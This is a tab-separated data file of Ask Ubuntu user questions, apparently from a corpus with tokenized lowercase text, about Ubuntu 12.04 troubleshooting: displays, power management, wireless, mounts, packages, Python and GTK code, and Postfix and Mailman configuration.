181075	why opendialog.py do n't work on jotty application	i 'm a python beginner , i installed quickly , i wrote a `` quickly tutorial '' in terminal and i did all the steps before at : '' however , the application is not complete . there are a few things left for you to do : '' all the next steps are n't finished yet because when i use open dialog and select one of the files saved , the content of the file is n't showed on `` textview1 '' , why ? only is deleted the content written . before if was used without dialog works great . savedialog.py work great . -def on_mnu_new_activate ( self , widget , data=none ) do n't work neither . -if i use the bold lines by the others do n't work . # # # def open_file ( self , widget , data=none ) : def on_mnu_open_activate ( self , widget , data=none ) : # # # def save_file ( self , widget , data=none ) : def on_mnu_save_activate ( self , widget , data=none ) : to view the code , go to the link above , unrar the archive , install `` quickly '' if you do n't have it yet , place inside on jotty directory , then put `` quickly run '' , `` quickly edit '' , `` quickly design '' , depending what do you want to do . code - problematic code with opendialog implemented . code-part1 - works ok , but without opendialog . acces to the two codes here i need principally that opendialog function work great . advance - > go to the last message here
181076	screen blink twice every 10 seconds on ubuntu 12.04	on 12.04 64-bit , about every 5 seconds my screen blinks twice . even during installation of ubuntu from cd , this happens during the complete process . i had no problems with earlier ubuntu versions ( earlier version was 10.04lts 64-bit ) system specs : i7-2600k msi 7681 motherboard 16 gb ram 2 x nvidia 560 card sli ( only 1 screen on 1 card active during install process ) this flickering is driving me crazy , please help .
181078	i ca n't get suspend , hibernate and shutdown to work in ubuntu 12.04	i recently built a computer with these specs : asus motherboard , intel i3 3.3 ghz dual processor , 8 gb of ram . i installed 12.04 on a brand new hard drive . i partitioned the hard drive between root , home and swap like i have often read how to do . i can not get this machine to properly shutdown . i have to hold the power button down now . although , for the first few days it properly shutdown . i also can not get the system to hibernate or suspend properly . i have read tons on this and watched many youtube tutorials on how to fix both , but the computer never wakes up after suspend or hibernate . it just stays on a black screen . can anyone help ? i love 12.04 so far , but these setbacks are making me worried about stability and power management issues . also , i wonder if it 's really bad for the hard drive to force the cpu to shutdown .
181082	building monolithic kernels will improve performace of the system ?	i am using ubuntu 12.04 . if i build monolithic kernels for device drivers i.e driver will have its own kernel as i understand , will it really improves system performance and device performance ? are there any disadvantages ?
181088	dual monitor/xinerama not working ; can not even detect on-board graphic card	i have kubuntu 12.04 and two identical vga monitors . one i plugged via dvi-vga adapter into the dvi port of my discrete amd radeon hd 6670 , the other into the vga port of my on-board graphic card ( radeon hd 6410d ) . after installing kubuntu i got a black screen , so i booted with nomodeset and installed amd 's catalyst drivers but only the monitor plugged into the discrete graphic card worked . using lspci i saw that the on-board graphics was not listed . then i found in the bios settings the options `` surround view '' and `` onboard dual link dvi '' both disabled . after enabling both , the on-board graphics card shows up in lspci but in amdcccle , it only shows as [ uknown display ] uknown adapter . when i try to enable xinerama , i get a black screen after rebooting on both monitors . i tried several options and hints from the web but nothing worked so far . i also reinstalled the amd drivers several times . what should i do ? edit : do you think it would help if i buy another dvi-vga adapter and try to plug the monitor via this adapter into the dvi port of the on-board graphics card ? okay , i think i try the additional dvi-vga adapter and report back when this also does not work .
181092	i wonder if my two new usb stick run to slow	i have bought a two kingston usb sticks , with 8 gb & 32 gb i wonder if they run to slow . it seems that the biggest run faster with ext4 . question : do these two usb stick run enough fast or are they broken ? question : why does one usb stick run much faster with ext4 , but the other does not ? finally my opinion is that boht usb sticks are mad of a very low cost technology in comparison with usb hard drive or an usb ssd , but i can be wrong . i could run hdparm -i against all my hard disk and my usb hard disk , but not against both usb sticks . why do i really make this question ? this question comes from : can i install grub on an usb and make it a rescue disk ? , because i wanted to know if i could make a clean installation of ubuntu in a usb drive . now i see that perhaps it depends on the quality of this drive . srs @ ubuntu : ~ $ dmesg | grep -i sdb [ 3.277465 ] sd 6:0:0:0 : [ sdb ] 15138816 512-byte logical blocks : ( 7.75 gb/7.21 gib ) [ 3.279611 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 3.279683 ] sd 6:0:0:0 : [ sdb ] mode sense : 2f 00 00 00 [ 3.281741 ] sd 6:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 3.288860 ] sdb : sdb1 [ 3.294503 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk srs @ ubuntu : ~ $ dmesg | grep -i sdc [ 175.121840 ] sd 7:0:0:0 : [ sdc ] 60437492 512-byte logical blocks : ( 30.9 gb/28.8 gib ) [ 175.122604 ] sd 7:0:0:0 : [ sdc ] write protect is off [ 175.122609 ] sd 7:0:0:0 : [ sdc ] mode sense : 45 00 00 00 [ 175.123112 ] sd 7:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 175.127221 ] sdc : sdc1 [ 175.129221 ] sd 7:0:0:0 : [ sdc ] attached scsi removable disk srs @ ubuntu : ~ $ sudo hdparm -tt /dev/sdb1 // sdb1 is a partition with 6 gb of fat32 /dev/sdb1 : timing cached reads : 23052 mb in 2.00 seconds = 11537.47 mb/sec timing buffered disk reads : 56 mb in 3.09 seconds = 18.11 mb/sec srs @ ubuntu : ~ $ sudo hdparm -tt /dev/sdb2 // sdb2 is a partition with 2 gb of ext4 /dev/sdb2 : timing cached reads : 22668 mb in 2.00 seconds = 11345.37 mb/sec timing buffered disk reads : 58 mb in 3.06 seconds = 18.95 mb/sec srs @ ubuntu : ~ $ sudo hdparm -tt /dev/sdc1 // sdc1 is a partition with 16 gb of fat32 /dev/sdc1 : timing cached reads : 25156 mb in 2.00 seconds = 12591.29 mb/sec timing buffered disk reads : 56 mb in 3.02 seconds = 18.52 mb/sec srs @ ubuntu : ~ $ sudo hdparm -tt /dev/sdc2 // sdc2 is a partition with 16 gb of ext2 /dev/sdc2 : timing cached reads : 23476 mb in 2.00 seconds = 11749.46 mb/sec timing buffered disk reads : 106 mb in 3.00 seconds = 35.30 mb/sec
181093	python3 support in quantal ?	in quantal , python3 is supposed to be the default version of python . however , it seems that e.g . python-matplotlib package is only packaged for python 2.7 ( and there is no python3-matplotlib ) . what is the transition plan ? when is python3 going to be fully supported , including major packaged 3rd party modules ?
181096	ubuntu 12.04 not starting ( dual boot )	on my dual booting laptop , i have windows xp and ubuntu 12.04 . i 've had xp on the laptop for years , and install ubuntu 12.04 a few months ago . for some reason , ubuntu 12.04 has stopped working . when i power on the laptop , i get the grub menu , and i can select windows xp or ubuntu 12.04 . if i select windows xp , it boots up perfectly and i can use it as normal . however , if i select ubuntu 12.04 , it just displayed a terminal type blank screen with no text except the blinking cursor , but no commands execute if i try typing something in . how do i fix this so i can boot back into ubuntu 12.04 ? i know i can try a reinstall , but i do n't want to lose the files i have in ubuntu 12.04 . is it possible to somehow do a repair ?
181100	sound lag in vlc after i resume from a paused movie	i recently made a shift to linux and this never used to happen when i was using windows . after i pause a movie and i press play again , there is a sound lag . i have to restart the movie every time i have to pause it . is this fixable ?
181102	array manipulation in gsettings ' set command	is there an easy way to do array manipulation in gsettings ? i am comparing gsettings to os x 's defaults command that offers the defaults domain -- array key overwrite-value and defaults domain -- array-add key added-value interface for manipulating arrays . as far as i can tell there is only gsettings set domain key `` [ 'overwrite-value ' ] '' available to gsettings . not really pretty for when you want to add or remove one entry from an array . i have seen a suggestion that allow me to add to an array , but i would rather use a interface if there is one .
181108	sony vaio pcg-71315l `` wireless is disabled by hardware switch '' help !	i 'm a new user to ubuntu and linux as a whole , i 've had it for a few months and just as i 'm starting to get a feel for things my wireless decided to quit on me . this puzzled me so i checked all the switches on the vaio ; my wireless switch was on ( my bluetooth was also working ) , and in my windows partition the problem is non-existent . help please ? anyways after executing the `` rfkill list '' command this was the outcome : 1 : sony-wifi : wireless lan soft blocked : yes hard blocked : no 2 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : yes hard blocked : yes 4 : hci0 : bluetooth soft blocked : no hard blocked : no as stated in the title my laptop is a sony vaio pcg-71315l edit- shortly after a few more failed attempts i was looking around and found this forum question with roughly the same problem , anyways they resolved it by switching the wifi off via the actual switch , then entering `` rfkill block wifi '' into the terminal , i then turned the wifi switch to on and entered `` rfkill unblock wifi '' into the terminal . it almost fixed it , it now picks up wifi but when my wifi 's name and passphrase are entered ( and have been entered correctly , many many times ) it refuses to connect , thanks for the help thus far , any ideas pertaining this problem ?
181111	how can i set ircd-hybrid server password ?	i have been struggling with this for days , is there a way to set up a password for an ircd-hybrid server so that no one can connect to it without first entering a password ? i have the server up and running . i can connect to it , and create rooms perfectly . i just need to password protect it .
181112	how to disable clone display mode on ubuntu login screen ?	i 'm using toshiba satellite l750-20c laptop as primary display ( screen resolution 1366x768 ) and aoc e2243fw monitor as external display ( screen resolution 1920x1080 ) . in most cases laptop lid is closed so external display aoc is dominant . when i power on that configuration , ubuntu login screen is displayed in clone mode ( it is indicative after opening laptop lid and look in both screen displays ) . in that case both screens are in low resolution mode and login background image is distorted ( stretched ) on aoc monitor . otherwise if i power on laptop display first and then plug aoc monitor in vga connector , both displays are operating in extended display mode with their native resolution ( which is desirable ) . after closing laptop lid again aoc monitor continues displaying login screen in its native resolution ( 1920x1080 ) . is it possible to disable clone display mode on ubuntu login screen so each monitor can display login screen in its native resolution ?
181114	unable to set background image using python ( 2.7.3 ) , bash and gnome3	# ! /usr/bin/env python import os bashcommand = `` gsettings set org.gnome.desktop.background picture-uri file : ///home/malon/autowallpaperchanger/ '' + pic_name print bashcommand os.system ( bashcommand ) print result : gsettings set org.gnome.desktop.background picture-uri file : ///home/malon/autowallpaperchanger/wallpaper-1252048.jpg copying and pasting the print result into a terminal makes the change successfully , so the command is correct , but os.system is n't processing the request correctly for some reason . in the full script ( posted below ) , i use os.system for a different reason immediately before ( wget ) and that works fine . full script here .
181115	how to fix : `` the connection to the server was reset while the page was loading . `` ?	i have a 64-bit ubuntu 12.04 installed . i used to login to a website ( chess.com ) but since a few days ago i get this message : the connection was reset the connection to the server was reset while the page was loading . the site could be temporarily unavailable or too busy . try again in a few moments . if you are unable to load any pages , check your computer 's network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . this is the case in firefox , and chrome . a friend of mine confirmed to me that the website is working fine and he could access it . and i can access many other websites and facing no issues except for this website . i tried switching the use tls 1.0 option as suggested by someone but this did n't fix it . can someone suggest a way to fix this issue ?
181122	manually re-enable wireless and bluetooth	so , today , i decided to turn off bluetooth to save battery power . when i did so , it did everything like normal . whatever . but whenever i want to re-enable wifi and bluetooth , it just has `` enable wireless '' and `` enable bluetooth '' grayed out in the respective things on the top-right of the desktop . i am using 12.04 precise pangolin on a dell laptop that has never had wireless problems before . clicking the grayed-out part does nothing . re-logging and restarting has no effect , and i 'm on an account that has full administrative permission . my attempts : ~ $ sudo dmesg | grep wlan0 [ 19.960211 ] addrconf ( netdev_up ) : wlan0 : link is not ready . ~ $ sudo dmesg | grep blue [ [ nothing ] ] what do i do to manually re-enable wireless and bluetooth ?
181126	fade out label / button / status bar with gtk	what is the easiest way to fade out and fade in elements in python / gtk 3 ? coming from webdevelopment , my initial take on this problem was to call c = widget.get_style_context ( ) , c.remove_class ( 'visible ' ) , c.add_class ( 'invisible ' ) but that did n't work out ( do i have to call something like `` redraw '' ? ) i also added a transition to the gtk css . thanks , wolf edit : i might specify what i would like to achieve : i have this `` statusbar '' which is just a vertical container on my app ( like in the screenshot on top of this page http : //uberwriter.wolfvollprecht.de/ ) . if the mouse is not moving , i want to fade all that stuff out ( also to preserve computing power // no recalculation of word- and char count ) and to minimize `` distraction '' ) . i already found the appropriate event to listen to ( motion-notify-event ) , so now i only need to add a simple fade out and a timeout . if someone can point me to a solution , be it with clutter or cairo , i would be very happy .
181127	ubuntu ssd install issue	was not able to install ubuntu 12.04 lts or 11.10 on ssd ocz vertex 3 120gb installer crashed . there is no more information . installer promised to report issue to ubuntu . do i have to prepare something to install ubuntu ? hardware is quite fresh : cpu : i5 2500 motherboard : asus p8h67-m lx/si video card : asus nvidia en210 silent/di/1gd3/v2
181130	how to get rid of devices in the left panel of nautilus ?	i would like to rid of not mounted ntfs partition from nautilus ' right panel ( i just want 352 gb filesystem - d drive to be there . first of all 352 gb filesystem is in fact d so i do not know why it is duplicated . secondly i have put acer and system reserved to be nouser mounts on purpose , so that i ( or sombody else ) will not format it ( or else ) by accident . so my /etc/fstab looks like this : # comments ... ... . # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=1384cee0-6a71-4b83-b0d3-1338db925168 / ext4 noatime , errors=remount-ro 0 1 uuid=e3729117-b936-4c1d-9883-aee73dab6729 none swap sw 0 0 # -- -- -- my windows d drive -- -- -- -- -- uuid=98e8b14de8b12a80 /media/d ntfs defaults , errors=remount-ro , user 0 0 # # -- -- -- -acer -- -- -- -- -- -- -- -- uuid=01cbea9d4476c2f0 /media/acer ntfs defaults , noauto , noexec , ro , nouser 0 0 # # -- -- -- -system reserved -- -- - uuid=01cbea95760f9330 /media/systemreserved ntfs defaults , noauto , noexec , ro , nouser 0 0 # uuid=58f9-c17e /boot/efi vfat defaults 0 1 blkid and fdisk -l root @ xxx : /home/yyy # fdisk -l ... device boot start end blocks id system /dev/sda1 4096 27262975 13629440 27 hidden ntfs winre /dev/sda2 27262992 27467791 102400 7 hpfs/ntfs/exfat /dev/sda3 27467792 232267775 102399992 7 hpfs/ntfs/exfat /dev/sda4 232267793 976771071 372251639+ f w95 ext 'd ( lba ) /dev/sda5 232267795 918867967 343300086+ 7 hpfs/ntfs/exfat /dev/sda6 * 918870016 968044543 24587264 83 linux /dev/sda7 968046592 976771071 4362240 82 linux swap / solaris root @ xxx : /home/yyy # blkid /dev/sda1 : label= '' pqservice '' uuid= '' 01cbea95730d28a0 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' 01cbea95760f9330 '' type= '' ntfs '' /dev/sda3 : label= '' acer '' uuid= '' 01cbea9d4476c2f0 '' type= '' ntfs '' /dev/sda5 : uuid= '' 98e8b14de8b12a80 '' type= '' ntfs '' /dev/sda6 : uuid= '' 1384cee0-6a71-4b83-b0d3-1338db925168 '' type= '' ext4 '' /dev/sda7 : uuid= '' e3729117-b936-4c1d-9883-aee73dab6729 '' type= '' swap ''
181135	problems with ttf font rendering under libreoffice	microsoft ttf-fonts such as calibri and cambria are n't rendered correctly at certain page zoom levels : ( i installed the microsoft fonts manually by placing them in the ~/.fonts directory and updating the font cache ) . is there any way to improve microsoft font rendering under libreoffice ?
181138	broken burg install after backup/restore	long story short : burg is stuck in text mode and i ca n't seem to get it back to the eye-candy . i have purged and then re-installed to no avail . i am running 12.04 . the long story : i originally installed onto 12.04 using super-boot-manager ( burg-manager ) and then stopped using it in favour of grub because i had too many entries . i then had to backup and restore ubuntu ( partition was deleted and re-created ) due to unrelated issues . i re-installed grub2 and booted into ubuntu to re-install burg , but after re-booting it appears to be stuck in text mode ( looks exactly like grub 1 ) . any ideas ? i know i 'm not supposed to be using it on 12.04 ( i think ) but it worked before , so what 's up ?
181142	how do i install monodevelop 2.10 or later on 12.04 ?	sudo apt-get install monodevelop installs monodevelop 2.8.x . the official site , http : //monodevelop.com/download , states that `` packages for monodevelop 3.0.3.5 not yet available . the latest available version is monodevelop 2.6.0.1 '' . i want to use the f # plugin for monodevelop which supposedly is only available for monodevelop 2.10.x and latter releases . how do i install monodevelop 2.10.x or latter on my ubuntu ? or is it not possible at all ?
181155	file disappeared from ntfs after ubuntu installation	i wanted to upgrade a very old version of ubuntu to a recent one , so i made the following steps : i created a large ( over 30gb ) tar.gz archive containing all data from my home directory moved it to ntfs partition launched ubuntu 12.04 from cd resized the ntfs partition during installation completed the installation then i launched my brand new ubuntu and wanted to copy the archive so : i mounted the partition on which the archive was located i have run ls -l in the place of file size , modification date etc. , a ? appeared instead of any values i launched windows xp which is installed on the same machine and it did not show that file on the partition at all linux also does not show the file anymore i tried running chkdsk under windows which did not fix the problem . i also tried ntfsundelete in linux which shows that this file can not be recovered . i would appreciate any help very much ! i have lost a lot of data . what could have happened ? is there any chance of recovering this file ?
181156	why i 'm not able to install wine on x64 ?	i got broken dependencies which i 'm not able to solve since i uninstalled ubuntu 11.04 and updated to 12.04.1 . that 's a fresh install =/ is anyone facing the same issue or did i screw something up ?
181162	access to usb devices not working properly	why can i no longer see the photos on my camera card after upgrading to 12.04 ( 64 bit ) ? in 10.04 lts i could read the camera card and import photos happily . now , under 12.04 lts ( 64 bit ) i can access the card in the camera and see the various folders , but can not see the image files , nor can i import them to the hdd .
181163	blank terminal after removing `` fortune cow ''	after removing the `` fortune cow '' for terminal , i 'm getting a blank terminal and ca n't actually do anything in it ( i can write but i ca n't install , remove or update anything ) . can someone help me ?
181164	how to uninstall unity webapps feature ?	i think the servers were not working and that was the origin of the problem i am running 12.04 and installed the unity webapps thing . i did n't like the result and want to uninstall it but ... i ca n't . it also broke adobe air because it messed up with the 32bit libraries ( needed for air to run ) . i used sudo ppa-purge ppa : webapps/preview as it 's explained in the ppa but i get thousands of errors : w : imposible obtener http : //es.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-es no se pudo conectar a es.archive.ubuntu.com : http : w : imposible obtener http : //es.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en no se pudo conectar a es.archive.ubuntu.com : http : e : algunos archivos de índice fallaron al descargar . se han ignorado , o se han utilizado unos antiguos en su lugar warning : apt-get update failed for some reason ppa to be removed : webapps preview comm : el fichero 2 no está ordenado package revert list generated : account-plugin-facebook/precise account-plugin-flickr/precise account-plugin-foursquare/precise account-plugin-google/precise account-plugin-identica/precise account-plugin-twitter/precise bamfdaemon/precise chromium-browser/precise chromium-browser-l10n/precise chromium-codecs-ffmpeg/precise indicator-appmenu/precise indicator-messages/precise indicator-status-provider-mc5/precise indicator-status-provider-pidgin/precise libaccount-plugin-1.0-0/precise libaccounts-glib0/precise libaccounts-qt1/precise libbamf0/precise libbamf3-0/precise libgwibber3/precise libgwibber-gtk3/precise libindicator-messages-status-provider1/precise libsignon-extension1/precise libsignon-glib1/precise libsignon-plugins-common1/precise libsignon-qt1/precise libufe-xidgetter0/precise libunity-core-5.0-5/precise libunity-webapps0/precise python-flickr-api/precise shotwell/precise signond/precise unity/precise unity-common/precise unity-services/precise unity-webapps/precise xul-ext-websites-integration/precise and then this : e : no se encontró la distribución «precise» para «libufe-xidgetter0» e : no se encontró la distribución «precise» para «libunity-webapps0» e : no se encontró la distribución «precise» para «python-flickr-api» e : no se encontró la distribución «precise» para «signond» e : no se encontró la distribución «precise» para «unity-webapps» e : no se encontró la distribución «precise» para «xul-ext-websites-integration» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-facebook» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-flickr» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-foursquare» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-google» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-identica» incapaz de encontrar un archivo «precise» para el paquete «account-plugin-twitter» incapaz de encontrar un archivo «precise» para el paquete «libaccount-plugin-1.0-0» incapaz de encontrar un archivo «precise» para el paquete «libaccounts-glib0» incapaz de encontrar un archivo «precise» para el paquete «libaccounts-qt1» incapaz de encontrar un archivo «precise» para el paquete «libgwibber3» now i ca n't update nor fix the adobe air problem .
181172	can not set up dual monitors due to errors running amdcccle	after i upgraded to 12.04 my dual monitors stopped working . after i try to set it up in settings/display i get error : the selected configuration for displays could not be applied : required virtual size does not fit available size : requested= ( 3840 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) failed to apply configuration : % s gdbus.errorrg.gtk.gdbus.unmappedgerror.quark._gn ome_2drr_2derror_2dquark.code3 : required virtual size does not fit available size : requested= ( 3840 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) if i try to edit it in amd catalyst control center ( i run the command gksu amdcccle ) i get this : ( process:2955 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:2955 ) : glib-gobject-critical ** : /build/buildd/glib2.0-2.32.3/./gobject/gtype.c:2722 : you forgot to call g_type_init ( ) ( process:2955 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( process:2955 ) : glib-gobject-critical ** : g_object_new : assertion `g_type_is_object ( object_type ) ' failed i tried to restore xorg.conf many times and start over but did not help . i have an ati radeon hd 3450 video card and ati/amd proprietary fglrx driver installed .
181174	how do i enable sound with the `` linux-virtual '' kernel ?	i 've been trying to enable sound for the linux-virtual kernel as i want to run an ultra slim ubuntu server under virtualbox but need audio . the resource usage difference between virtual and generic/server is surprisingly large , with the virtual kernel system using 80mb less ram after a clean boot ( 130mb vs 210mb ) , and i really want to squeeze every clock cycle and available byte i can out of the system . besides , the virtual kernel has some additional optimisations enabled specifically for virtual machines ( or so i am told ) . now i have compiled my own kernel a few times in the past , for example to include the intel-phc module ( for improved power management on thinkpads ) , so the concept is not entirely alien to me , but i 've run into a strange problem which i 'm hoping someone can help explain : when i do a diff between the config files for linux-generic and linux-virtual there are precious few differences , and certainly none which pertain to sound support ; there are really only five or six lines which differ , and they 're mainly to do with i/o timing , sleep state and priorities . what gives ? i expected the differences to be extensive , and that i would be able to identify the options that enabled audio by looking at them , but my problem does n't seem to be related to the config file at all ( yes , i know about the sound drivers section - it is identical between the two kernel configs ) . am i looking in the wrong place ? many thanks !
181175	mount network ntfs drive as nfs	i have a ntfs nas mounted on my ubuntu pc ( 11.10 ) to /mnt/nas2/ i wish to set this up as an network drive so my windows pc can access it . i 've tried directly mounting the ntfs nas to my windows pc , and i can access the files , but my streaming server software does not work with it . my /etc/exports looks like this : /mnt/nas2/ 10.x.x.x ( rw , all_squash , async , insecure_locks , no_acl , no_subtree_check , nohide , insecure ) my /etc/fstab looks like this : //10.x.x.y/goflex\040home\040public\media /mnt/nas2 cifs username=username , password=password , iocharset=utf8 , file_mode=0777 , dir_mode=0777 , _netdev 0 0
181181	assign title bar double click action to fill entire screen except unity panel and launcher	i 'm currently using 12.04.1 64-bit . i prefer to use the title bar action buttons ( min/max/close ) on right side . sure i can make them appear on right side from ubuntu tweak but it wont work in full screen mode . shifting between right and left is lot of pain and is one of the main issues preventing me from using ubuntu . there is already a bug report here . it affects many people . i believe these kind of settings needs to be versatile , but seems there is nothing much can be done till unity adds this feature . i would request for a similar alternate solution which i think is definitely possible . what i want is when i double click on a title bar , the window should n't maximize , instead it should fill the entire screen excluding launcher and unity panel . i actually used something similar to this in compiz configuration settings manager , where desktop binding to the top had filled the screen . but i could n't find it in compiz now , maybe it has upgraded . please provide a solution for assigning title bar double click to fill screen excluding launcher and unity panel , so that i can have the action buttons on right side always .
181184	how can i switch languages like windows	how can i switch languages like in windows with alt+shift ( l or r ) or in any of alt+shift ? i make it work to get the next languages but it did n't get back to main language without using shift+l or alt+l .
181186	how to switch between headphones and speakers manually	i have an asus g60jx laptop with 12.04 installed . the laptop has the sound jack broken ( the jack thinks that there are always headphones plugged in , even though there is nothing . so i can hear the laptop with headphones , but when i unplug them , the internal speakers are silent . ) is there a way to switch between internal speakers and headphones manually ?
181188	how to install vlc in ubuntu 12.04 64-bit ?	can anybody help me to install vlc media player in ubuntu 12.04 64-bit ?
181190	how do i select wireless radio portions in ubuntu ?	bear with me , to be honest i have no idea what wireless radio portions are ... . at my school , i was told my the user support that the wireless network in my dorm uses 801.11 a/b/g/n . for some reason , the wireless in my room does n't work . however , other buildings use only a/b/g , they say . in any other building , my wireless works fine . how do i tell my system to use the g portion only ? ( as requested by user support in the email i received ) . here are the various logs/output requested : dmesg lshw -c network lsmod
181198	dxtn texture support , no `` enable s3tc ... '' option	i am having the same problem as described here . i 'm looking for support for dxtn textures . i ran worldwind in terminal and got the following error message : aug 22 , 2012 5:28:12 pm gov.nasa.worldwind.layers.texturetile initializetexture severe : exception attempting to read texture file javax.media.opengl.glexception : dxtn compressed textures not supported by this graphics card i tried the suggested solution from here sudo apt-get install driconf driconf under `` image quality '' change `` enable s3tc ... '' to yes . save . the driconf solution did not fix the problem . there was no `` enable s3tc ... '' option in the image quality tab . i think i am using nouveau driver and i wonder if i should switch to the nvidia driver ? computer : dell precision m6400 processor : intel® core™2 duo cpu t9550 @ 2.66ghz × 2 ubuntu : 12.0.4 lts video card : nvidia quadro fx 2700m graphics : gallium 0.4 on nv94 any ideas ?
181200	no root privileges - how do i add a user to the sudo list ?	i do not have root privileges - how then do i add a user to the sudoers list ?
181204	how to prevent ubuntu from changing screen brightness ?	i have recently installed 12.04 on asus-k53sv-v300 . i can change the brightness on start-up with : echo 0 > /sys/class/backlight/acpi_video0/brightness > > /etc/rc.local or manually by fn key . but , whenever ubuntu dim my screen brightness to save power or wake-up from suspend or inactive for 20-30 seconds , brightness reset to high ( my problem get much more when on battery ) . how can i disable screen brightness service to prevent it from changing my brightness ? what service work on screen brightness ? if i disable this service , can i manually set brightness by command ? find a replacement to work on brightness instead of default power manager .
181207	synaptic package manager has stopped working in ubuntu 12.04 unity	synaptic package manager was working in my ubuntu 12.04 installation under unity , but it recently stopped working for no apparent reason . it does work when i switch to kde . suggestions ?
181209	libreoffice writer header	every time i hover my cursor over the top/bottom of a page it displays a small box to add a header/footer i am quite irritated by this behavior . how do i turn this feature off ?
181215	too many open files - how to find the culprit	when running tail -f filename , i got the following message : tail : inotify can not be used , reverting to polling : too many open files is that a potential problem ? how do i diagnose what 's responsible for all the open files ? i have a list of suspect processes , but if they do n't turn out to be the culprits , instructions that do n't rely on knowing which process to check would be useful .
181217	precautions during ssh	i recently had to give away my ubuntu 12.10 root password to one of my friends so that he could ssh into my system and send some files to me . now he is my friend and i trust him so i was not reluctant in sharing my password . and i did change it afterwards . but it just struck me how can i view all the commands that were executed by some other user remote logging into my system ( obviously not my friend . i mean in general ) .to what extent can they access my data ( especially my passwords eg i use last pass so can they access my account passwords as well ? ? ) and if they open any browser after logging into my system do they have access to all my passwords provided i have saved them using the `` remember password '' option given by chrome also what precautions i should take when i am allowing some one to remote login in my system and how can i track the various commands used by them or the changes they made in my system . also is there some simple way to get notified whenever some one logs into my system apart from checking the /var/log/auth.log file ? ?
181218	/etc/postfix/transport missing ; what should it look like ?	i 'm following the mailman guide but could n't locate /etc/postfix/ so created it as follows : root @ dur : ~ # root @ dur : ~ # cat /etc/postfix/transport dur.bounceme.net mailman : root @ dur : ~ # root @ dur : ~ # telnet localhost 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 dur.bounceme.net esmtp postfix ( ubuntu ) ehlo fqdn_test 250-dur.bounceme.net 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-starttls 250-enhancedstatuscodes 250-8bitmime 250 dsn mail from : testing @ transport.com 250 2.1.0 ok rcpt to : thufir @ localhost 451 4.3.0 < thufir @ localhost > : temporary lookup failure rcpt to : thufir @ dur.bounceme.net 451 4.3.0 < thufir @ dur.bounceme.net > : temporary lookup failure quit 221 2.0.0 bye connection closed by foreign host . root @ dur : ~ # root @ dur : ~ # postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases , hash : /var/lib/mailman/data/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix default_transport = smtp home_mailbox = maildir/ inet_interfaces = loopback-only mailbox_command = /usr/lib/dovecot/deliver -c /etc/dovecot/conf.d/01-mail-stack-delivery.conf -m `` $ { extension } '' mailbox_size_limit = 0 mailman_destination_recipient_limit = 1 mydestination = dur , dur.bounceme.net , localhost.bounceme.net , localhost myhostname = dur.bounceme.net mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 readme_directory = no recipient_delimiter = + relay_domains = lists.dur.bounceme.net relay_transport = relay relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining , permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = $ myhostname smtpd_sasl_path = private/dovecot-auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes tls_random_source = dev : /dev/urandom transport_maps = hash : /etc/postfix/transport root @ dur : ~ # root @ dur : ~ # tail /var/log/mail.log aug 28 02:05:15 dur postfix/smtpd [ 20326 ] : connect from localhost [ 127.0.0.1 ] aug 28 02:06:10 dur postfix/smtpd [ 20326 ] : warning : hash : /var/lib/mailman/data/aliases is unavailable . open database /var/lib/mailman/data/aliases.db : no such file or directory aug 28 02:06:10 dur postfix/smtpd [ 20326 ] : warning : hash : /var/lib/mailman/data/aliases lookup error for `` thufir @ localhost '' aug 28 02:06:10 dur postfix/smtpd [ 20326 ] : noqueue : reject : rcpt from localhost [ 127.0.0.1 ] : 451 4.3.0 < thufir @ localhost > : temporary lookup failure ; from= < testing @ transport.com > to= < thufir @ localhost > proto=esmtp helo= < fqdn_test > aug 28 02:06:23 dur postfix/smtpd [ 20326 ] : warning : hash : /var/lib/mailman/data/aliases is unavailable . open database /var/lib/mailman/data/aliases.db : no such file or directory aug 28 02:06:23 dur postfix/smtpd [ 20326 ] : warning : hash : /var/lib/mailman/data/aliases lookup error for `` thufir @ dur.bounceme.net '' aug 28 02:06:23 dur postfix/smtpd [ 20326 ] : noqueue : reject : rcpt from localhost [ 127.0.0.1 ] : 451 4.3.0 < thufir @ dur.bounceme.net > : temporary lookup failure ; from= < testing @ 